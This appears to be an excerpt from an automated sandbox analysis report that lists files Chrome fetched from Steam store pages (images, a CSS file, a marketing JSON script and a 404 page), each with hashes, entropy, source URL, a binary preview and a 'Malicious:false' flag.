        Preview:.PNG........IHDR...4... .....]?[f....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):78350
        Entropy (8bit):7.983737487882643
        Encrypted:false
        SSDEEP:1536:1bkL039wBgZErD5fOy06WnaugyOoKaIqqP48W6/8fK7c3lq9ArCB2bDiey:dk7BtD526WnaurdKaLr8W60C9ACBK3y
        MD5:C95EDB1ADF2E60DE04484F7987B5753B
        SHA1:D6EE3A7331450EB3C37B95723FB9B4A0A4871890
        SHA-256:8F79DA18B5CD943A4451A06A965D9C387F703B3ED7B5843DCFC77B806C020F40
        SHA-512:F2F0CD2F7C245A8B4C022D83B2A2FF75FD8751B5500CB028385BED83A73199A23E5F4A625CFBFF85097B9F3C53B3899D56CE9EF53C431F4A0F7BDB4BB9A19728
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/730/ss_d830cfd0550fbb64d80e803e93c929c3abb02056.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................R.........................!.1A.."Qaq.2..B....#Rb..3r..$...4CSs..6ct...%&5...7Dd...................................;........................!1A.Q."a.2q...#BR...3....Cb.$4r..............?..3G(O..0.8.P.Y.....t.....$..C....7.P.?\b...0....pn.P1....J..a.M...K,._.L.Z...+/..q$D...|*M.L..x...0+..._.3..F1*.0..ez.$......."..q"U.mc}...).U^..$...<X.,...].)X....e..Q...<...9c!.N.3...}Z..+V..".G.J..&..........y..t.0U@.~...h..../.hH.G...k.8....3...ka..E./...`.....A....)S^.*F..._.#{..Zx..M36w/NVI... n...8..jE..B.#!.*......&c %I;.0W.}....Cs....eC)...{.y.Q.@i > lV...T. .......0.!..U......E%ts.E..$>/#|Z3...J....[.-.<MV...ap5].....!.S-.Ty}_..i!..%..H.|t. ..)..9.Jv....0..n9?..H.g....J...A......>....?.-.3..!..H#u"..u4.6.".m.>......g.......Q.Q...t....j.....E.....y_.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):238132
        Entropy (8bit):7.987622067912985
        Encrypted:false
        SSDEEP:3072:wEiwX4mWXUXAgCv3V10Cd5HfNA6JN8SKzNacFiVMO+OqOziRyPC9u2SqYv7jh/BD:JiNUQgSJd5F7n/T9zimC9iOohBIrXx6d
        MD5:508E88B11C5C905E6B05D77E789CFD39
        SHA1:1A817A529C47317FB3BED749FB59732D3710C9B8
        SHA-256:152C1F5897DA97B3A1BA141C9C0DB6D443FAEB7067063648675C9C76B6319609
        SHA-512:9D6C3B6DB3852B5D0064FBF62C89C267BEC7B7847EF96D6AA442BACD7CF295F497C7080DC0990AA9E34B138F21D3B5D09924826C6E00E573A066981D174D7431
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/wcc23.png?t=1705420866
        Preview:.PNG........IHDR...X...........v....pHYs................KiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2023-02-20T14:19:15+02:00" xmp:ModifyDate="2023-02-20T14:19:15+02:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:9ea35d4a-7fce-0947-af03-fae1927e
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):7013
        Entropy (8bit):7.940014840126126
        Encrypted:false
        SSDEEP:96:oE5jPKRnqGpPF2L/k1jiz12H+ljngIjlOGW9DBnzKopzHGzNd/blx8xsRiJ1/bdL:oKu11hukG4egIpOFOopzQbJRi/dsKr6i
        MD5:A0B18D7B76B3B5D87676E8D007076B65
        SHA1:44256BBF500B7F9E50FF824D6B523ECE38B3CD8F
        SHA-256:4FE182430AE2655125FEAECBD12DA607A2356DCB7C3E8874AC76C7B5BF05EB5D
        SHA-512:B9DDA9E0AE18016C43557686E8B5891A9C293AAC3C8C4FA7E1B716076481489F77F06A26A6DB573E1296D4C77AA6AA3BD9517EA5AE99B94B3581DB44691D0523
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/381210/capsule_184x69.jpg?t=1715982910
        Preview:......JFIF.............C....................................................................C.......................................................................E.................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....1......*..,m.xaI...lLJq.!7.$......{.k.....4......,..k.E......s...['}1.!...r...40d.~.2Z.....w..f.l.F'.....?.3..^..B.il.8..)..M.Kg...a\P..(.8.(.A.R@..a.e..3.....q@.FQ..(.\K.m....E.`..J..o..>.#`.W.P....n!.%..Y.....1...c.........&Gs.%.)5.'...l...h.m.....].#8C..V.n.N..)}.4...'dnY..Xc....I\.gJ..@./.J.GC7"..i.........Qy..(:...I...5$.......54....tr...\V..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):3160
        Entropy (8bit):7.8296175189826
        Encrypted:false
        SSDEEP:96:vxl4lZWxD75NzL4K49+ZChTC+e40mGP9n:pa4Tfje+YhTC1401Fn
        MD5:0FDA4E1E47FB88B274A86C04A63C4BB8
        SHA1:93F8ED1F529660C290FB833FEE760A389C1C309E
        SHA-256:48DEC840C57EB383D1734E798300B0B379680DDF92D2BCF04EA0009F7C4150A9
        SHA-512:EB94681B6AFC72CCA3AE08BA2DA4D5F27F534C5FD9C0C46DA642D4DC2D44AB7EA22CC58101363D5B86BEC56EE23170A6384164B13E3091F458BA52FD1A1EC7DF
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_1fe5db2c19c1deb43e442149760327db8b6876bd.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................;.........................!.1AQa."2q..4....35r....#s.$Bb................................).......................!1A.."2Qaq.3.#B.............?.._.!.7l.V..n.d..&..m.....+.H`.QI..s.Kc..J..Jlb...QX.#..z.R........W...y..#.zX]......c0.L..8..@\...,.Lgd.-.I.....v.,.>..f.lpC....k/c.v}....3\.'W...#...3.J.l....S.K[..q..@.g..b.W..S...km..#.F,.6.....I...c..[..}.]..M2...Y....8##..~5,2..ItS<2..g..O....x..!....(..Q...8?.!..(6.=.;...;..*.=-..B%%...l\.S.*.$..N..H:.6d....=......S.....#>.).L....d|1...>.....R..w..@..e.N......i6?a.....=PK.py..|....8....JW...q..<.Q]...cm+HP........k........,...ku,..Mq0V.0\..#.n1....#...9/..&o._...........x...Wd....+d._n.+@..|X..?...#'...B..C.gl.H%~..B.6.my...b.n.u..........I.x.26.9.S.>8.;...>[..G..&<..]...-....b..d...F7vop.Up.6.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):34225
        Entropy (8bit):7.981752682161347
        Encrypted:false
        SSDEEP:768:nfCwCACoY4V0bhEQr9sZytmHUJ96VF8J7b6hy+Ne2tc7cB:fcbEQr9XE5VFAqz3c7K
        MD5:C28BAE522C9D35F1FCF0674DE41FFD26
        SHA1:ACD56DDF9857945CB2051A35842C26BD9F33F342
        SHA-256:4B53E5D28D1258C28BA8297B85ACB55C1E1EA32E89D162A1A3E830C0564D128C
        SHA-512:3BD00489834A2E39D01CA1857C3A87202A54E75384DEBEC7BCAFC71FFDE2AFFF4209BEFDDB6FD3BE87DBCE64A7BCC7435CBBC665F8DD72E4C4FF00DE63A13927
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2849510/header.jpg?t=1708377975
        Preview:......JFIF.............C....................................................................C.......................................................................................................................b............................!1.."2A..#QaqBRbr......$3Ss...%Cc..&4DTt.....5....'6e....7EFUWu.....................................>........................"2.B...R.#34q.!$1Qab.ASr....5...%CD.............?..M.v............K..YN.......@.G.-.._.P& q^^r...9H.. 6...h.O....G.?..[..6T.:F/...t.`.@....m~...U.o..3U.i.......~w...5.......l..H... l.@......676n.|t.q....x.2.2..V..T.=.|..PSe..`r.:.P..?/.>....v2,.Y........H.....Iz....)..-....r.........5-<....d..r.i.t..0.%....^q.....9\..h}..&e..|}...N....a......?.C.P...9.wG....p5...%.......n.0*......Dg.f.06...........S.+..p.1.x\....uv....M......<^...Q..h..4Z...>..(&(,;=.b.yL..\a.A..@..,. ..,.m..Q.;.\@....@v6A.V.s.d.......a{\...L.R.$!zDf..S.D......."e.........O.P..n.80\..J.O..*.Qlkk...'15.l.[.\.uqD....)R..PL...IA...j
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x103, components 3
        Category:downloaded
        Size (bytes):5844
        Entropy (8bit):7.923006877213236
        Encrypted:false
        SSDEEP:96:AqwNxggm9gU/ofr/kBqlmbpaXuU36rLi3cd1U7KSOwtT32paHiWNOxjJMJZ:ONxggm95ofIBqA8VKi3NWSOwt7jiWNOO
        MD5:C9C35CF2A91D5E4773E6991D013B6D1F
        SHA1:DEDF37957D17E06752592C9882BD5E2440F1E8A1
        SHA-256:ACB5E36460933573815822284F0F06ADDE749F7DD29A62D9D2EED40886C3A44C
        SHA-512:3B41DD5B7349CDBE6B5235DAE110F357B0F159115C2B30415C8336B649C6772131A754FB18D7F6537C3F21743C84BD1E9BFF3934DE4A233974609098261E374E
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256837730/movie.184x123.jpg?t=1705420849
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................g..............................................7.........................!1A.."Qaq..2...#B.....3R..C.................................2......................!1..AQ."aq.2..#..R.3B.................?....L.#.q.;.&.C.8`..H........]......+.f..2x.?.25Z.+Oa~..s:....q....t7.#8d..Q...N..fC..".@.^.`a.e......}?.......+x.eX...q..I..D].o"P.d......oe....0S.`x.-.k......c$....1....J...E.....I<...H...n...n."Um.........aMB%...u.q.n...:1\.n.9.A....."..(%.qv.E...Lg.4.7.......x.e}.3..Dx....e.e...2.... .\...Ki!Kv.....0{.....0.....]1.FT..g8..R....2.-HKt2I.B.9...O.M{...j......8=~.VU..x...=...L..-.h..S/.........&]ZH.@..q.I>.S....6..19...D+.).d.v....LP.....%.}.....<.iO...5.J..Q..`...........H.Nw)#..H..F.+...2. .y.;.L.[.4..~....J....T.x:.)..b*.q.G..&I..eIs.N.8 ..B..T@....g.5...s.. ..$}@.....Em..D+...8.sHn.1..+.}.${X.. ....?...s
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 71x71, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):44949
        Entropy (8bit):7.9626820576485615
        Encrypted:false
        SSDEEP:768:prJWpsPg5RoTlbF8XgoY7Ea0zF7EE+v97oih2MTxv:ZJJThbF8XgoY7Ea0JEdlkcFT5
        MD5:768065D12F96305EAC4D38371D278A9D
        SHA1:C69598DFA93508A41F3B64B3563808051CF90885
        SHA-256:FE42B4DCCE71BBDD00E72C2DD934DFEEDEF9E001A8EEAFF434A96B903665B900
        SHA-512:2DDD0F3E89DE52907256AD78C3029DBA032DD34D4C0A4823E354FC4EA44D997884DEF35CD30D650BDAA00AAFC58ECA755B72235DBFF8CFF031F3D5E5CB0F2606
        Malicious:false
        Reputation:low
        Preview:......JFIF.....G.G.....C....................................................................C.......................................................................Q.X..".........................................M..........................!1A..Qa."q..2...#BR3..br....$4..%CD...5Sct...6FT.................................3........................!1A."2Q..aBq...#..3R..r..............?...WA...#5.G..3.D)F?....@.... .+.6j`.v.. ....N....q....-...7.q..j....o..Ku.8.7..7.S...-P....v.....]....H....R%.....jD.E!.j.,.d.T..K>.R.....N.K..*....H.=.2p*...P...*T1C.p"..C..Z..Q..q..b.D.j-..dG..v...jd1F"=L........z....Dz..{R....q.T.Q..Dj[.I.7..Doj9..dG.......oj.....F....Js.D...S7...j#.N...;.(.">jdF..Q..DzK.b..c.L.=..G...cr.:.]...M.*..P.h..#.I...C. m.Gs.KR.rh..~..Z..3.'..L...#w.G.RK[m.I.2...$....p./~JBq..i...g.]....<....1.@.;f..M....D.....$/.\..[...S.....'.-4...D.o%.N...5)..5.....pI..5$hv.kRc.J....M2.a6..R.:.t...(Ta.7&+.c.5...H..I....l./HzR...RH.....w|...D....SB:..(.\S38/s..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 32x32, components 3
        Category:dropped
        Size (bytes):1963
        Entropy (8bit):7.745285552130413
        Encrypted:false
        SSDEEP:24:O8zo0XxDuLHeOWXG4OZ7DAJuLHenX3yCUKGOmSG2qIwZhcC+k2iPQK8UEtfvjliL:guERAoEGOi2quC+krwfLsk6pqi90gV+E
        MD5:B4AAC940C33C90BE09D2CCF69E540A6D
        SHA1:A58740BDF4BEB5714D8093CB965B49D3EF248F04
        SHA-256:D289D8A021768BBA3D9491146437434CD80282628D8FB4ABEEA8F0588037BECA
        SHA-512:E56C56F2ABBF10A4189AD2B8326338CB4FD8E1CC22B47BCF96FB223721A7CF10DFA3F196A596C3F5CE5934AEEA973A420057F7042FB2FC237B4DEF0D1FC3086D
        Malicious:false
        Reputation:low
        Preview:......JFIF.....&.&.....C....................................................................C....................................................................... . ...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....q..-.#iQx...hR1.Vv..{..a.2V<.&...AP...E....<..~.|M.....N..mf..+...i,~9.I.v).+;;...+I....'.R..M.]x.F..<9...r..0G.r..C..2.P....s+..RX.D.RI%.6...5.~.Y....IQ.iB4...J)...{..?.~'....-.3.lu..W&t.#..+.M..C.j.A...Mk..r.<^..T[[..^.:^Kf..C7....^*jO.j....]5-tw8....\...qay..\...Y...c.,Q.U6.l..M.........(y.H.K...Ki5v..]..7..D.c.8C.&...I^....7.k....-Y...\.F.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (22672), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):22838
        Entropy (8bit):4.872557171851413
        Encrypted:false
        SSDEEP:384:+VicfSf4+JAslpN+MhZxEOIqisxp9RO6orsH1XQSmRyeyZ/84t1SSzNQvIkoVMxc:lp4+blpNN7VMxsgE3kSd5/VQ47hD
        MD5:6C901BD882E3F651F217E8B756595286
        SHA1:A4AC60012194FF6850EF3978710C192E4A980174
        SHA-256:7ECB4DCC1E500D3FED9687C38FEC0F5117BBE6CB0D8630B3D25A7CE04A2E21BE
        SHA-512:FDA2BA95C3DFE78476038170259D50782E47D5C4D6D59D11E6ADB1F896687E9329234A58495805AC3CA23C724E9EF4AE56D3FB28AA98E58180A58F64C5035166
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/marketing_english-json.js?contenthash=deef5c040fa6e28f22c9
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[4929],{5:e=>{e.exports=JSON.parse('{"language":"english","label_play_free_until_custom":"Play for free until %1$s.","promo_ends_custom":"Offer ends %1$s.","label_play_free_generic":"Play for Free!","label_free_weekend":"Free Weekend","label_free_week":"Free Week","label_just_updated":"Just Updated","label_for_a_limited_time_only":"FOR A LIMITED TIME ONLY","msg_prepurchase_and_play_beta_now":"Pre-Purchase and Play the Beta Now!","msg_play_beta_now":"PLAY THE BETA NOW!","msg_prepurchase_and_get_beta_access":"Pre-Purchase and get Beta Access","msg_steam_workshop_now_available":"Steam Workshop Now Available","msg_now_with_steam_workshop":"Now with Steam Workshop","msg_now_with_steamworks":"Now with Steamworks","msg_now_available_on_steamos":"Now Available o
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):2651
        Entropy (8bit):7.8170433430075414
        Encrypted:false
        SSDEEP:48:vi5aZ1d/oT2nsAThZfi4DNCnGOMyWhMlKp7QOP+U+AAZDtJSfcZL:vwaHd/oK3DNKMyrKp7QOGU+dJscd
        MD5:559EBD1876851C6276969E2E80D1C2D9
        SHA1:8510131F1B8BB218A353F33A124F34E14F5CFE46
        SHA-256:1A7AD30DB2470C198B1D76EC6B5229EC7C4F4415992A635B42CCD8613FF8DC97
        SHA-512:CE00E246EFE169476EBD1A762B2465B787E4EE4ED9723E1586CE34EB24EA9894F6A1A8646585752B3DBEA736C298579CFCF50E334ACD49A4C8410B010634DC75
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_2b12e7fd93b6a12ff5980e4857eaea4343900e9a.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................?.........................!1.AQq."2a...34B....#Rr...$5C..bstu...............................".....................!1.A.Q.2q".............?...``.g.=..v}>..(y...-.2.]......^..4.+.r..I....3X..]..[.XF.T..q....-o..0q-..ZN..ppz.wS ..IH.@.b7$az..~4..8.F.Fp.t#.....<S....x.B..8*..1..q...TS.X"O....g.A...=.....A.2....l..N..^...B.;..@\..L.Aj...7.p..."..I..l.h..........I..W&......jZiW. VV...Fi....6.~.W. ..0...5..]t...R.1.?...|[...Q.;.I..B....cp>#,?......X+.d....0...`.....h.mGPv...[.. ..#.wR8..@.[.:.........$..T...;,2.A.(b;...,..a..l...@....:=&{.;K4...Z4m.vO.M(.R.$.U..Wd.f..W..Iy..q.....C....KCc......p..."`...B..n.bA.]....y-t.Rs..h-S;=|=......}...Lz...K'.B.......t....t.e....h"{.N...3...i>t...]C...p=.\...a@.....[.3...X`1..m..C.k2...0...0.S...[...(.C.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):26385
        Entropy (8bit):7.974629531685947
        Encrypted:false
        SSDEEP:768:EO9jH11SFHyB9c36wKTruXd/x6ZPZP1CzB8dSS8:EOpHxB9S6pTruXpMdDQedSS8
        MD5:A47C1DEAB80B1465AB83EABBE59781ED
        SHA1:2FC622363150BD1ABB8B5C66F45127C52AE69D26
        SHA-256:3FEDE1EF6D1DAA3E7C4806E33F6650E3D794CE8D5F91648FE76CBBE498E30CEF
        SHA-512:0AD78C825585709E31D0429FC1D33D97DCE35671BC400B534CEA0226D0CAD338819EDF9DF1897D32E84C648EEFC1F3093AAB3E32FA3CB3C6B58F58D28CC3C7A7
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1966720/header_292x136.jpg?t=1700231592
        Preview:......JFIF.....&.&.....C....................................................................C.........................................................................$............................................S........................!..1..AQ."aq#2B.......RT....3CDSb....$cr...%45.......EUd..................................R........................!1.AQ.."aq..........2BRSb....#r.3......4Cc$6DT..%5Ust...............?..|.G.A.A.BU..(o...d.?.?V5.*.NR..g.EX....G?V4.R..=CM}...b8#?...$T.5 .-.._.U.....cH....H!.O...*.t.~.>.i".}o:z.f...i!..}X.j..t.6.....*.C.2.X.j..t.6....."..w.u...J...aj..~QR-.?...k....K.F~...QC.:.X...(-Y.?.+.I....c^.W.:.Z3...WB....~.k^q\iO...c...Q..:.X.9.q..?f?..}.......+..n-Y.1.Et(...~.k^q_[......"..P..P.V5..q..(...=U"..zS..cm\kql...R..3..>.k.j..u....1.*t.C.N.V5..q...~.x....@.../.{i\|.{.g...E....~.k.J.^...1.+.@../.ci\k..?Px..~..V5..q...~....[.....c^.W.:.2...U.B?...{m\k...f<.@.1....cY.W.:..3.c....!..~.km.q..?f?.........W.:n.V~.~.Q5.?...o....M.j
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):33754
        Entropy (8bit):5.263648577784315
        Encrypted:false
        SSDEEP:768:1rv31+3R8zIF/3doix2R1pW81qWZRhcJGHJhmJfLN:FpP1vZRx/yLN
        MD5:1ABBFEE72345B847E0B73A9883886383
        SHA1:D1F919987C45F96F8C217927A85FF7E78EDF77D6
        SHA-256:7B456EF87383967D7B709A1FACAF1AD2581307F61BFED51EB272EE48F01E9544
        SHA-512:EDDF2714C15E4A3A90AEDD84521E527FAAD792AC5E9A7E9732738FB6A2A613F79E55E70776A1807212363931BDA8E5F33CA4414B996DED99D31433E97F722B51
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=Grv-5yNFuEfg&l=russian&_cdn=cloudflare
        Preview:.btn_green_white_innerfade {...border-radius: 2px;...border: none;...padding: 1px;...display: inline-block;...cursor: pointer;...text-decoration: none !important;...color: #D2E885 !important;........background: #a4d007;.....background: -webkit-linear-gradient( top, #a4d007 5%, #536904 95%);..background: linear-gradient( to bottom, #a4d007 5%, #536904 95%);..}......btn_green_white_innerfade > span {....border-radius: 2px;....display: block;...........background: #799905;.....background: -webkit-linear-gradient( top, #799905 5%, #536904 95%);..background: linear-gradient( to bottom, #799905 5%, #536904 95%);....}.....btn_green_white_innerfade:not(.btn_disabled):not(:disabled):not(.btn_active):not(.active):hover {...text-decoration: none !important;...color: #fff !important;........background: #b6d908;.....background: -webkit-linear-gradient( top, #b6d908 5%, #80a006 95%);..background: linear-gradient( to bottom, #b6d908 5%, #80a006 95%);..}......btn_green_white_innerfade:not(.btn_disable
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, progressive, precision 8, 940x250, components 3
        Category:dropped
        Size (bytes):71723
        Entropy (8bit):7.975046220353434
        Encrypted:false
        SSDEEP:1536:4EIBQ3IpJ/fDOsyOHl9eQ4A9fFVyrYbYo95yAj8dmZ4W0AIX:4EI23aasyGFfOrU9Zj8O0AU
        MD5:02A0ADB8033EACFB33FBA9BB1B771B71
        SHA1:BE35A2AF2AEC81B8D1C7B091713446C841964948
        SHA-256:0FD28202E936544C1119CFCB0696ECC75576D64D7A12AC04912B9C9A1AD4612F
        SHA-512:37F93BAAFD7502D1143F98298D5E94225C4CFC4EC8347C23D3BACF11BA3817E3883DFF5DC502AC25BE0DCEA2E534A29E2814E718540CBFF2BE38A5B9867FED67
        Malicious:false
        Reputation:low
        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 616x353, components 3
        Category:dropped
        Size (bytes):75922
        Entropy (8bit):7.9782639142345895
        Encrypted:false
        SSDEEP:1536:ObwAsMmXKXxKZzFsHkp263ZW1prjwJOjy8zlZTw411K+o:nCmXKXxKlFsSxUHjwJEy8zlO411K9
        MD5:93E1E87071B56A9119E582BC3371AB69
        SHA1:C5FC07F5C6E03706EB65E3DA24E4310C1BD3C47A
        SHA-256:828B445919A687F658437720FB2E0A00435BEC122080EA3A2AFBD543DD3FA62A
        SHA-512:D781DC67373885902DD8EDBB1079BEDD52B5BA1935C5C59A09397193AF1DAA9593444A035FD3987D294566057F13B46E3CD3083F203EF9CFC31956B34365E7D3
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................a.h.............................................^.........................!.1..A.."Qa2q....#B..R....$346brt...57su....%Cv..8DS......c...'FT..................................<.......................!1.A."Qaq...2........#3BR.4r.$..CDb............?..@...G1.hd.)...gU..2...Y.H...&q`..<L)9<jI.yW.V......5u* ....D....|.U*x.g.R......I0i.@%FU.......^.0%..3.........\.j...u*@j<..'.K+...b...aG./W...'....uU.5..11..:*...A ...H....'....A...jj.3.S*7.L.05...s...u*@b.P....W2..I..Vv...L...j.g.V.,4PV.?MV./TR+....F..0...R......A.Q....G.NN.V<4r.$.h@.q...9...G.....6u4./..V.s...<+K*..3...S....C..s...,.PK.&.d..m4-.&G/...='.{......r5H.H.D.Y<.H....'.,..s.-A.<.5.GeQ.Fr....P0{.S9.i.,..5 ...j...j.$.RI..d.j.T.F..2^5%..S.T.(...0./k....I\..x....a..b:...t..L.o.c.>|h..........?6&X.b......n5$.t...9.\..f.*8.BO}.!.....!:g.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with no line terminators
        Category:dropped
        Size (bytes):289
        Entropy (8bit):4.950000999886855
        Encrypted:false
        SSDEEP:6:haxUU7oRUqZX/JU8cMuBUrX8l2/MRJqRvPnNX96AwFbvTj6gmzRG7gRna:haxlomiX/JLFuQX8leMR4vvmRbvTj6g1
        MD5:45AC9DECA88DE47DC082D97A5C25DF62
        SHA1:B60E853D65349EC0E6F397F2CED2F1CA19DA16E7
        SHA-256:EEE00D8BA305543BE6AF21634BC2959F0C266033016253A074ECA3CBE39E1C87
        SHA-512:E1994ABE202F1A5C4E14717329B0D20DAD05D2B75CA2715D13A08258DBA7CDE7EE257419BC4876DC1304B43FC28DE1BF8291353D1FB374B2630116F6F377281F
        Malicious:false
        Reputation:low
        Preview:<!DOCTYPE html><html><head><title>Error 404: Nothing found</title><style>html, body { padding: 0 3px; text-align: center; font-family: sans-serif; font-size: 13px; margin: 0 auto; }</style></head><body><h1>404 - Not found</h1><hr><div>The requested file does not exist.</div></body></html>
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (40632), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):258393
        Entropy (8bit):5.111281556384336
        Encrypted:false
        SSDEEP:6144:EkJGi6STj7b27R1WLIH3Sxs4XBB7YkJ6i23j4V6a9Ud6dX9c16gU+hUyVWF1rW7A:EkIi6Ij7b27R1WkXSe4XBB7YkJ6i23jA
        MD5:DBDDFF7C5F9282D3FBFF826A90B9BA68
